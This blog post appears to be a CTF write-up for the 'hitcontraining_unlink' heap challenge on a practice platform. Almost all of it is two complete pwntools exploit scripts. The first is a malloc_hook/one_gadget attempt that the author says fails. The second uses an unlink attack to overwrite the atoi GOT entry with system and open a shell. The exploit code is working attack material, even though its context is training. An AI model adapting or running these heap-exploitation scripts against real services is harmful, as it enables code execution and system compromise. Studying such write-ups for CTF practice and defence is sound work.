hitcontraining_unlink

hitcontraining_unlink

查看保护
请添加图片描述
请添加图片描述
在change功能里没有检查size大小。一开始直接打hook来着,结果最后add时出问题。。。。。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27530)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice:'

def add(size, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Please enter the length of item name:', str(size))
    r.sendafter('Please enter the name of item:', content)

def edit(index, size, content):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Please enter the index of item:', str(index))
    r.sendlineafter('Please enter the length of item name:', str(size))
    r.sendafter('Please enter the new name of the item:', content)

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Please enter the index of item:', str(index))

def show():
    r.sendlineafter(menu, '1')

add(0x10, 'aaaa')   #0
add(0x40, 'bbbb')   #1
add(0x30, 'cccc')   #2
add(0x10, 'dddd')   #3

p1 = b'a' * 0x18 + p64(0x91)
edit(0, len(p1), p1)

delete(1)

add(0x40, 'aaaa')
show()

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
success('malloc_hook = ' + hex(malloc_hook))

libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
one = [0x45216, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[0] + libc_base

free_hook = libc_base + libc.sym['__free_hook']
success('free_hook = ' + hex(free_hook))

add(0x30, 'aaaa')

add(0x60, 'aaaa')   #5
add(0x10, 'bbbb')   #6

delete(5)
p2 = b'a' * 0x18 + p64(0x71) + p64(malloc_hook - 0x23)
edit(3, len(p2), p2)

add(0x60, p64(one_gadget))

add(0x60, b'\0' * 0x13 + p64(one_gadget))   #7

add(0x10, 'aaa')

r.interactive()

最后add发现打的会出错,那还是用unlink吧,改got为system。具体unlink攻击手法见z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27530)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice:'

def add(size, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Please enter the length of item name:', str(size))
    r.sendafter('Please enter the name of item:', content)

def edit(index, size, content):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Please enter the index of item:', str(index))
    r.sendlineafter('Please enter the length of item name:', str(size))
    r.sendafter('Please enter the new name of the item:', content)

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Please enter the index of item:', str(index))

def show():
    r.sendlineafter(menu, '1')

bss_addr = 0x6020c8

add(0x40, 'aaaa')   #0
add(0x80, 'bbbb')   #1
add(0x80, 'cccc')   #2


fd = bss_addr - 0x18
bk = bss_addr - 0x10
fake_chunk = p64(0) + p64(0x41)
fake_chunk += p64(fd) + p64(bk)
fake_chunk += b'a' * 0x20
fake_chunk += p64(0x40)
fake_chunk += p64(0x90)

edit(0, 0x80, fake_chunk)

delete(1)

atoi_got = elf.got['atoi']

p1 = p64(0) * 2 + p64(0x40) + p64(atoi_got)
edit(0, 0x80, p1)

show()

r.recvuntil('0 : ')
atoi_addr = u64(r.recv(6).ljust(8, b'\x00'))
success('atoi_addr = ' + hex(atoi_addr))

libc = ELF('./libc-2.23.so')
libc_base = atoi_addr - libc.sym['atoi']
one = [0x45216, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base
system_addr = libc_base + libc.sym['system']

p2 = p64(system_addr)
edit(0, 8, p2)

r.sendlineafter('Your choice:', '/bin/sh\x00')

r.interactive()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值